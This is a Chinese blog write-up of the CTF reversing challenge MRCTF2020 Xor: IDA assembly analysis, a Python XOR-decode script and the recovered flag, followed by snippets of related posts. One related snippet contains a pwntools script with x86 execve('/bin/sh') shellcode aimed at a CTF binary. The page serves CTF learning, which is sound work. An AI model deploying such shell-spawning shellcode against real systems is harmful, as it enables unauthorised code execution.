BUUCTF-RE-[MRCTF2020]Xor

最新推荐文章于 2025-04-14 22:01:41 发布
最新推荐文章于 2025-04-14 22:01:41 发布
阅读量1.7k 收藏 4
点赞数 2
CC 4.0 BY-SA版权
分类专栏: RE CTF 逆向
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Henlenl/article/details/116295727

[MRCTF2020]Xor

查壳

发现是无壳的
在这里插入图片描述

IDA分析

查找字符串,找到这个Give Me Your Flag
在这里插入图片描述通过交叉引用 来到sub_401090
在这里插入图片描述
然后 F5 发现报错了 不能F5,而且不是sp错误
在这里插入图片描述
那我们干脆直接看汇编
首先我们看到 这里压入了byte_4212C0 和 %s
这个我们就知道 flag其实储存在byte_4212C0中

在这里插入图片描述
然后我们看到 loc_4010B6 我们可以知道 edx 寄存器不断自增,最后退出循环,然后再与27 进行比较,这个时候我们就知道,flag的长度就为27

如果输入的长度 大于27 那么就提示错误
在这里插入图片描述
如果不小于 那么先与eax异或 然后 再与byte_41EA08进行比较
在这里插入图片描述
基本思路理清楚 我们就可以写脚本了

get flag

脚本

str1 = 'MSAWB~FXZ:J:`tQJ"N@ bpdd}8g'
str2 = ''
for i in range(len(str1)):
    str2 += chr(i ^ ord(str1[i]))
print(str2)

flag

MRCTF{@_R3@1ly_E2_R3verse!}

buu-[MRCTF2020]Xor
qaq517384的博客
03-06 504
32位无壳 执行 ida查看字符串
BUUCTF-[MRCTF2020]Xor 题解
qq_66455531的博客
06-19 327
这个得靠经验了,本菜鸟也是半推半猜弄出来的,叫我详细讲解,我也讲不太懂,可以去看大佬们的,我反编译成C++流程就是,输入的字符串进行异或操作,与目标字符串对比,那么脚本就很好写了。反正汇编代码已经给你了,而且又不难,所以我们通过读汇编来手动写程序。得到flag{@_R3@1ly_E2_R3verse!
re题(31)BUUCTF-[MRCTF2020]Xor
2301_80907001的博客
08-09 458
然后是一个循环,把edx处存的数据给al,让edx自增,让al自己逻辑与运算,当al是零的时候ZF标志位为1,不进行跳转,不是零继续自增。因为edx处存的是flag,当flag字符取完后,al就是零,往下执行,让edx减去ecx剩下的就是flag的长度,再做一个比较,可以知道flag长度是27。然后让flag[eax]与eax异或,再与已知字符串比较,相等的话,让eax加一,重复异或和比较,直到eax等于edx,继续往下执行,打印right。是27往下执行,这时候eax是0,异或完是0。
[MRCTF2020]Xor
最新发布
qq_32304353的博客
04-14 139
运行可以得到flag:MRCTF{@_R3@1ly_E2_R3verse!修改格式flag{@_R3@1ly_E2_R3verse!然后与eax进行xor在与byte_41EA08比较。这里是edx自增与27比较,>27就报错。32位无壳exe程序。得知flag长度27。
MRCTF2020Xorbuuctf-re)
Lenard404的博客
03-14 4824
buuctf做题记录 查壳 无壳32位 IDA反编译 试图直接对main函数反编译会弹出提示: 所以查看401095处的汇编: 点进sub_401020,F5反编译: 返回main函数处,再次F5,反编译成功: 方法指导 分析 简单分析,函数有printf,scanf,system等,进行一个重命名和隐藏不需要的显示,逻辑就很清晰了: 首先判断是否输入33个字符 然后对每个字符按从0到32的索引号对该字符进行异或 最后将异或后的字符与byte_41EA08比较,相同就输出Right 查看byt
buuctf——(MRCTF2020Xor
yhfgs的博客
06-06 724
1.查壳。
[BUUCTF]REVERSE——[MRCTF2020]Xor
mcmuyanga的博客
12-12 552
[MRCTF2020]Xor 附件 步骤: 例行检查,32位程序,无壳 32位ida载入,首先检索程序里的字符串,根据字符串的提示,跳转到程序的关键函数 根据flag,跳转到sub_401090函数 可以看到v0和byte_4212c0按位异或,最后得到byte_41EA08就会输出right 看一下byte_41EA08的值 直接写个异或的exp看一下byte_4212c0里的值 a="MSAWB~FXZ:J:`tQJ\"N@ bpdd}8g" s="" for i in range(len(a
BUUCTF Reverse/[MRCTF2020]Xor
ookami6497的博客
07-26 708
BUUCTF Reverse/[MRCTF2020]Xor 没有加壳且为32位程序 IDA32位打开发现主函数无法反编译 根据这个解决IDA出现Decompilation failure: call analysis failed不可以F5的问题找到401095这个位置,双击跟进,按F5查看伪码,然后再返回到main函数中,就能正常查看伪码了 int __cdecl main(int argc, const char **argv, const char **envp) { uns
buuctf.crypto 1-100
m0_73889365的博客
02-15 1282
buuctf crypto 刷题
[buuctf] crypto全解——85-120(不建议直接抄flag)
ao52426055的博客
11-24 8930
yxx 查看题目 啥也不是没看懂 用010查看进制 32位,再来查看明文.txt发现刚好也是32位字符,于是怀疑这道题是道一次性密码本OTP的题目,将明文与密文的txt一位一位异或即可得到flag 上脚本 python2的 h=['0A','03','17','02','56','01','15','11','0A','14','0E','0A','1E','30','0E','0A','1E','30','0E','0A','1E','30','14','0C','19','0D','1F','10'
buuctf reverse 学习报告
littlepieces的博客
11-18 480
DIE查壳,64位无壳,IDA打开,shift+f12。
BUUCTF逆向刷题——[MRCTF2020]Xor
CYP11112的博客
10-13 1491
这好像是一道简单的题,仔细一点就能解开。 IDA打开字符串 发现right后面跟了一些字符串,点进去看看 发现多了一个M,但是无关大雅,都复制了试试:MSAWB~FXZ:J:`tQJ"N@ bpdd}8g 然后想到标题XOR,进行编写脚本。 得到flag:MRCTF{@_R3@1ly_E2_R3verse!} ...
BUUCTF [MRCTF2020]Xor
liulala987的博客
08-22 343
看到flag双击跟进 main函数 但是发现main函数不能F5编译 提示401095 于是先找到401095。这段代码的核心在于找到一个长度为27个字符的字符串,使得该字符串的每个字符与其索引的异或结果等于。对于每个字符,程序将其索引(作为无符号8位整数)与用户输入的相应字符进行异或操作,并将结果与。数组中相应位置的字符进行比较。如果所有字符都满足这个条件(即异或结果与。中的值相等),则继续执行;发现main函数可以查看伪c代码了。数组中相应位置的字符。
[Buuctf] [MRCTF2020] Xor
Bileton的博客
03-05 498
异或加密,玄学跳过call analysis failed
buu:[MRCTF2020]Xor
weixin_60553183的博客
01-16 319
查壳,无壳。点进去发现没有main函数,start函数巨长不看。到strings window查。 点进去交叉引用 这个感觉是要我的老命。只能看我看不懂的汇编语言。 这里push是修改栈顶压入栈,看到%s可以推断输入的字符串存在了byte_4212c0里。 然后看到这里我大呼妙,inc为自加一,cmp是比较 ...
[MRCTF2020]Xor 题解
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
05-17 633
[MRCTF2020]Xor 题解
28.[MRCTF2020]Xor1(保姆教程)
TiAmo_TA的博客
04-13 215
嗯,大致是,输入flag,对flag的数位判断要等于27,否则报错,之后对flag进行异或,结果为MSAWB~FXZ:J:`tQJ"N@ bpdd}8g,脚本直接写:(拿捏)!按空格键,会呈现出地址,找到了,call指令调用 一个函数,跟进一下。跟进进去,F5可以使用了,左侧找到main函数,直接进入。F5报错,根据提示,找到401095。查壳了解基础信息:32bit。
BUUCTF-others_shellcode
03-26
### BUUCTF Others Shellcode 题目解题思路 BUUCTF中的`Others_Shellcode`是一道典型的PWN类题目,主要考察选手对于Shellcode编写以及Linux环境下的漏洞利用能力。以下是关于该题目的核心解题思路: #### 一、题目背景与目标 此题目提供了一个可执行程序文件,其功能是读取用户输入并尝试运行特定指令。然而,由于存在某些安全机制未启用(如NX位关闭),攻击者可以注入自定义的Shellcode来实现任意命令执行。 通过分析可知,目标是要构造一段能够绕过现有防护措施的有效载荷(shellcode),最终达到获取flag的目的[^1]。 #### 二、具体技术细节解析 1. **逆向工程** 使用工具如Ghidra或者Radare2对给定二进制文件进行静态反汇编分析,确认入口点函数逻辑及其调用链路情况;同时也要注意查看是否有其他隐藏的功能模块被触发的可能性。 2. **确定ROP Gadget** 如果发现保护机制开启了部分控制流完整性验证,则可能需要用到Return-Oriented Programming (ROP) 技巧构建新的执行流程路径。这一步骤涉及查找合适的gadgets组合形成所需的系统调用序列。 3. **编写Shellcode** 基于上述准备好的信息,按照实际需求定制化设计payload内容。考虑到不同架构下寄存器分配规则差异等因素,在撰写过程中需格外小心处理字节顺序等问题以免引起错误行为发生。 4. **测试与调试** 利用QEMU模拟真实机器环境下多次试验调整直至成功完成挑战为止。期间还可以借助strace跟踪进程活动状况以便更好地理解整个交互过程的工作原理。 ```python from pwn import * context.arch = 'i386' shellcode = asm(''' xor eax, eax # 清零EAX 寄存器 push eax # 将 NULL 推入堆栈作为字符串终止符 # 此处创建 "/bin/sh\x00" 的一部分 push 0x68732f6e # hs/n push 0x69622f2f # ib// mov ebx, esp # EBX -> 参数1: 文件名指针 ("//bin/sh") cdq # EDX <- EAX 扩展成双字长形式 (清零EDX) # DX 是第二个参数,这里不需要设置任何东西 mov ecx, edx # ECX <- 第三个参数也是NULL mov al, 0xb # AL 设置为syscall编号 execve() int 0x80 # 发起中断请求操作系统服务 ''') p = process('./vuln') p.sendline(shellcode) log.success(f'Shellcode Sent! Waiting for shell...') p.interactive() ``` 以上脚本展示了如何生成适用于Intel x86体系结构的一个简单execve("/bin/sh", ...) 调用样例,并发送至服务器端等待响应。 --- ###
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值